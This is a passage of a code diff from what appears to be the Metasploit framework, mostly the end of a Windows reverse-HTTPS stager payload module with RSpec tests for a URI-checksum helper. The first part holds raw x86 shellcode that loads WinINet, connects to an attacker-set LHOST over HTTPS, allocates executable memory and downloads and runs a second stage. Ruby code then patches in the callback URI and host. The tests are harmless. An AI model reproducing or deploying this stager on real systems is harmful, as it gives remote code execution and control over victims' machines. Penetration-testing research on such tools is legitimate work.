"\x10\x8B\x4A\x3C\x8B\x4C\x11\x78\xE3\x48\x01\xD1\x51\x8B\x59\x20" +
|
||||
"\x01\xD3\x8B\x49\x18\xE3\x3A\x49\x8B\x34\x8B\x01\xD6\x31\xFF\xAC" +
|
||||
"\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF6\x03\x7D\xF8\x3B\x7D\x24\x75" +
|
||||
"\xE4\x58\x8B\x58\x24\x01\xD3\x66\x8B\x0C\x4B\x8B\x58\x1C\x01\xD3" +
|
||||
"\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24\x5B\x5B\x61\x59\x5A\x51\xFF" +
|
||||
"\xE0\x5F\x5F\x5A\x8B\x12\xEB\x8D\x5D\x68\x6E\x65\x74\x00\x68\x77" +
|
||||
"\x69\x6E\x69\x54\x68\x4C\x77\x26\x07\xFF\xD5\x6A\x08\x5F\x31\xDB" +
|
||||
"\x89\xF9\x53\xE2\xFD\x68\x3A\x56\x79\xA7\xFF\xD5\x6A\x03\x53\x53" +
|
||||
"\x68\x5C\x11\x00\x00\xE8\x86\x00\x00\x00\x2F\x31\x32\x33\x34\x35" +
|
||||
"\x00\x50\x68\x57\x89\x9F\xC6\xFF\xD5\x68\x00\x32\xE0\x84\x53\x53" +
|
||||
"\x53\x57\x53\x50\x68\xEB\x55\x2E\x3B\xFF\xD5\x96\x68\x80\x33\x00" +
|
||||
"\x00\x89\xE0\x6A\x04\x50\x6A\x1F\x56\x68\x75\x46\x9E\x86\xFF\xD5" +
|
||||
"\x53\x53\x53\x53\x56\x68\x2D\x06\x18\x7B\xFF\xD5\x85\xC0\x75\x0A" +
|
||||
"\x4F\x75\xD9\x68\xF0\xB5\xA2\x56\xFF\xD5\x6A\x40\x68\x00\x10\x00" +
|
||||
"\x00\x68\x00\x00\x40\x00\x53\x68\x58\xA4\x53\xE5\xFF\xD5\x93\x53" +
|
||||
"\x53\x89\xE7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xE2" +
|
||||
"\xFF\xD5\x85\xC0\x74\xCD\x8B\x07\x01\xC3\x85\xC0\x75\xE5\x58\xC3" +
|
||||
"\x5F\xE8\x7B\xFF\xFF\xFF"
|
||||
|
||||
}
|
||||
))
|
||||
'Convention' => 'sockedi https'))
|
||||
end
|
||||
|
||||
#
|
||||
# Do not transmit the stage over the connection. We handle this via HTTPS
|
||||
#
|
||||
def stage_over_connection?
|
||||
false
|
||||
end
|
||||
|
||||
#
|
||||
# Generate the first stage
|
||||
#
|
||||
def generate
|
||||
p = super
|
||||
i = p.index("/12345\x00")
|
||||
u = "/" + generate_uri_checksum(Msf::Handler::ReverseHttps::URI_CHECKSUM_INITW) + "\x00"
|
||||
p[i, u.length] = u
|
||||
p + datastore['LHOST'].to_s + "\x00"
|
||||
end
|
||||
|
||||
#
|
||||
# Always wait at least 20 seconds for this payload (due to staging delays)
|
||||
#
|
||||
def wfs_delay
|
||||
20
|
||||
end
|
||||
end
|
||||
|
@ -6,7 +6,7 @@
|
||||
|
||||
require 'msf/core'
|
||||
require 'msf/core/handler/reverse_https'
|
||||
|
||||
#require 'msf/core/payload/windows/x64/reverse_https'
|
||||
|
||||
module Metasploit3
|
||||
|
||||
|
@ -9,6 +9,7 @@ describe Msf::Handler::ReverseHttp::UriChecksum do
|
||||
subject(:dummy_object) { DummyClass.new }
|
||||
|
||||
it { should respond_to :generate_uri_checksum}
|
||||
it { should respond_to :generate_uri_checksum_with_length}
|
||||
it { should respond_to :process_uri_resource}
|
||||
|
||||
describe '#generate_uri_checksum' do
|
||||
@ -28,6 +29,18 @@ describe Msf::Handler::ReverseHttp::UriChecksum do
|
||||
end
|
||||
end
|
||||
|
||||
describe '#generate_uri_checksum_with_length' do
|
||||
[0, 80, 88, 90, 92, 98, 255, 127].each do |checksum_value|
|
||||
[5,30,50,100,127].each do |uri_length|
|
||||
it "generates a #{uri_length} byte string that checksums back to the original value (#{checksum_value})" do
|
||||
uri_string = dummy_object.generate_uri_checksum_with_length(checksum_value, uri_length)
|
||||
expect(Rex::Text.checksum8(uri_string)).to eq checksum_value
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
describe '#process_uri_resource' do
|
||||
context 'when passed a value for INITW' do
|
||||
let(:uri) { "/7E37v"}
|
||||
|
Loading…
Reference in New Issue
Block a user